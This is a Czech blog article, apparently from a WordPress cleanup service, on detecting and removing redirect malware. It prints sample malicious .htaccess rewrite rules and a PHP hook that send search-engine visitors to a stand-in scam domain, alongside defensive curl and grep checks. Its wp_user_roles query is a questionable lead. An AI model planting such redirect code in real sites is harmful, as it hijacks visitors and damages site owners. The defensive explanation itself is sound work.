WordPress přesměrování na cizí weby: Jak odhalit redirect malware
Web přesměrovává návštěvníky na cizí stránky, ale vy nic nevidíte? Redirect malware cílí jen na mobilní uživatele nebo příchozí z Googlu. Jak ho odhalit.
WordPress přesměrování na cizí weby: Jak odhalit redirect malware
Datum publikace: 04. 04. 2026 Klíčová slova: wordpress přesměrování cizí web, redirect malware wordpress, web přesměrovává návštěvníky, wordpress virus přesměrování, přesměrování z google na podezřelý web Délka čtení: ~8 minut Meta popis (SEO): Web přesměrovává návštěvníky na cizí stránky, ale vy nic nevidíte? Redirect malware cílí jen na mobilní uživatele nebo příchozí z Googlu. Jak ho odhalit.
Zákazník vám napíše: "Váš web mě přesměroval na podivnou stránku." Otevřete prohlížeč, zadáte adresu, web se načte normálně. Zkusíte to znovu. Opět normálně.
Zákazník není blázen. A váš web není v pořádku.
Redirect malware — virus přesměrování — je jedním z nejzáludnějších typů napadení WordPress webu. Je záludný právě proto, že správce webu ho téměř nikdy nevidí. Přesměrovává jen konkrétní skupiny návštěvníků: ty, kteří přišli z Google, uživatele na mobilních zařízeních, nebo pouze první návštěvu z dané IP adresy.
Tím získává útočník čas. Váš web funguje podezřelé přesměrování desítky nebo stovky návštěvníků denně — a vy o tom nevíte.
Jak redirect malware funguje: 3 typy přesměrování
Typ 1: Přesměrování podle zdroje návštěvy (referer-based)
Nejčastější varianta. Malware zkontroluje HTTP hlavičku Referer — odkud návštěvník přišel. Pokud přišel z Google, Bingu nebo jiného vyhledávače, přesměruje ho na podvodnou stránku. Pokud zadal URL přímo do prohlížeče (jako vy při kontrole), přesměrování se nespustí.
Důsledek: SEO návštěvnost je přesměrována pryč, ale vy kontrolou vlastního webu nic neodhalíte.
Typ 2: Přesměrování pro mobilní zařízení (mobile redirect)
Malware detekuje User-Agent hlavičku prohlížeče. Mobilní uživatelé jsou přesměrováni, desktopové prohlížeče fungují normálně.
V roce 2026 pochází přes 60 % webového provozu z mobilních zařízení — útočník tak přesměrovává většinu vašich návštěvníků, zatímco vy vidíte na desktopu fungující web.
Typ 3: Přesměrování pro nové návštěvníky (first-visit redirect)
Malware ukládá cookie nebo sleduje IP adresu. Přesměrování se spustí pouze pro první návštěvu z dané IP adresy. Při druhé návštěvě web funguje normálně — proto i zákazníci, kteří přesměrování zažili, ho při opakované návštěvě nevidí.
Kde se redirect malware schovává
Na rozdíl od jiných typů malwaru se redirect kód může skrývat na více místech najednou — a útočníci ho záměrně distribuují, aby přežil i částečnou čistku.
Soubor .htaccess
Nejčastější umístění. Apache server zpracovává .htaccess před WordPressem, takže přesměrování funguje i při deaktivovaných pluginech.
Podezřelý kód vypadá takto:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC]
RewriteRule ^(.*)$ https://podvod.xyz/$1 [R=302,L]
Nebo sofistikovanější varianta s base64 zakódovanou cílovou URL:
RewriteRule . /index.php?_0xHEX=base64data [QSA,L]
Soubory functions.php v motivu
Redirect může být injektován do functions.php aktivního motivu jako PHP funkce, která na každé stránce přidá JavaScript přesměrování:
add_action('wp_head', function() {
if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'google') !== false) {
echo '<script>window.location="https://podvod.xyz";</script>';
}
});
Databáze WordPress — wp_options
Útočníci využívají WordPress options API pro uložení redirect konfigurace, která přežije i výměnu témat a pluginů:
SELECT option_value FROM wp_options WHERE option_name = 'wp_user_roles';
Hledejte zakódované řetězce nebo base64 bloky v hodnotách options, které by normálně kódování neobsahovaly.
JavaScript soubory a záhlaví stránek
Redirect skript vložený do globálního JavaScript souboru (jquery.min.js, scripts.js) nebo přímo do záhlaví šablony je obtížné odhalit ručně — soubory vypadají legitimně, škodlivý kód je obfuskovaný.
Jak redirect malware odhalit: Diagnostický postup
Metoda 1: Simulujte návštěvu z Googlu
Otestujte web pomocí nástroje, který simuluje příchod z vyhledávače:
curl -I -e "https://www.google.com" https://vas-web.cz
Parametr -e nastaví HTTP Referer na Google. Pokud odpověď obsahuje 302 Found nebo 301 Moved Permanently s podezřelou URL, web přesměrovává.
Alternativně použijte Chrome DevTools: Network → zkontrolujte při načítání, zda není přítomný redirect 301/302 na neočekávanou adresu.
Metoda 2: Otestujte z mobilního zařízení přes mobilní internet
Připojte telefon k mobilním datům (ne k Wi-Fi, kde by mohla být stejná IP jako váš desktop), navštivte web přes odkaz z Google. Pokud dojde k přesměrování, jde o mobile redirect.
Metoda 3: Použijte Google Search Console
GSC → Zabezpečení a ručně provedené akce → zkontrolujte, zda Google nenahlásil "přesměrování na hacknuté URL" nebo "škodlivý obsah".
Také: GSC → Výkon → zkontrolujte, zda náhle neklesl organický provoz. Prudký pokles bez zjevné příčiny může signalizovat, že Google vaše stránky přestal zobrazovat kvůli přesměrování.
Metoda 4: Skenery malwaru
Online skenery jako Sucuri SiteCheck nebo VirusTotal URL zkontrolují váš web z různých IP adres a User-Agentů:
Tyto nástroje ale neodhalí všechny typy redirect malwaru — zvláště ty, které reagují jen na konkrétní podmínky. Jsou dobrým prvním krokem, ale negativní výsledek neznamená čistý web.
Metoda 5: Manuální prohledání souborů
# Hledání podezřelých přesměrování v .htaccess souborech
find . -name ".htaccess" -exec grep -l "RewriteRule" {} \;
# Hledání base64 zakódovaného kódu
grep -r "base64_decode" . --include="*.php" | grep -v "vendor/"
# Hledání JavaScript přesměrování
grep -r "window.location" . --include="*.js" --include="*.php"
Dopad redirect malwaru na váš web
Nejde jen o špatný dojem u návštěvníků. Dopady jsou konkrétní a měřitelné:
SEO penalizace: Google přesměrování z výsledků vyhledávání aktivně sleduje. Web může být označen jako "hacknutý" nebo "zavádějící" a vyřazen z výsledků hledání. Obnovení pozic trvá týdny až měsíce i po vyčistění.
Google Safe Browsing: Pokud Google detekuje přesměrování na phishing nebo malware, váš web zobrazí červenou varující stránku — "Tento web může být nebezpečný". Toto varování vidí všichni návštěvníci a odstraní se teprve po schválení žádosti o přezkum.
Google Ads: Pokud inzerujete, Google Ads automaticky zastaví kampaně vedoucí na web s redirect malwarem. Viz náš článek o obnovení Google Ads účtu po malwaru.
Ztráta důvěry zákazníků: Návštěvník přesměrovaný na podvodný web vaši doménu spojí s nebezpečností — i po vyčistění.
Proč vyčistit pouze .htaccess nestačí
Mnozí správci po nalezení redirect kódu v .htaccess soubor vyčistí a považují věc za vyřízenou. Za týden se přesměrování vrátí.
Příčina: útočník zanechal backdoor (viz náš článek o falešných admin účtech), který automaticky obnoví .htaccess při každé návštěvě webu nebo v pravidelném intervalu.
Skutečná čistka redirect malwaru vyžaduje:
- Identifikaci všech výskytů — .htaccess, PHP soubory, databáze, JavaScript
- Nalezení a odstranění backdooru, který redirect obnovuje
- Identifikaci vstupního vektoru — jak se útočník dostal dovnitř
- Záplatu zranitelnosti — bez opravy původní chyby se útočník vrátí
- Verifikaci po 24, 72 hodinách a 7 dnech — pravidelné kontroly
Kdy to nevyřešíte sami
Redirect malware patří k technicky složitějším typům napadení. Pokud:
- Přesměrování se vrátí i po manuální čistce
- Nenacházíte zdroj kódu v .htaccess ani v PHP souborech
- Web byl označen jako nebezpečný Googlem
- Nevíte, jak bezpečně provést forenzní analýzu bez rizika dalšího poškození
...je čas zavolat odborníky. V rámci balíčku RESCUE provedeme kompletní forenzní analýzu, odstraníme všechny výskyty redirect malwaru včetně backdoorů a zajistíme odblokování webu u Googlu.
Shrnutí
Redirect malware je záludný tím, že ho správce webu vidí jako poslední — nebo vůbec. Mezitím poškozuje SEO, ohrožuje návštěvníky a může vést k zablokování reklam i webu samotného.
Podezřelé příznaky: zákazníci hlásí přesměrování, náhlý pokles organické návštěvnosti, GSC varování nebo zpomalení webu bez příčiny.
Pokud víte, co hledat, redirect malware lze najít. Ale najít všechny výskyty a trvale ho odstranit — to vyžaduje systematický přístup.
Zjistili jste na svém webu přesměrování? Neotálejte — každá hodina znamená další ztráty. Kontaktujte nás pro rychlou diagnostiku.
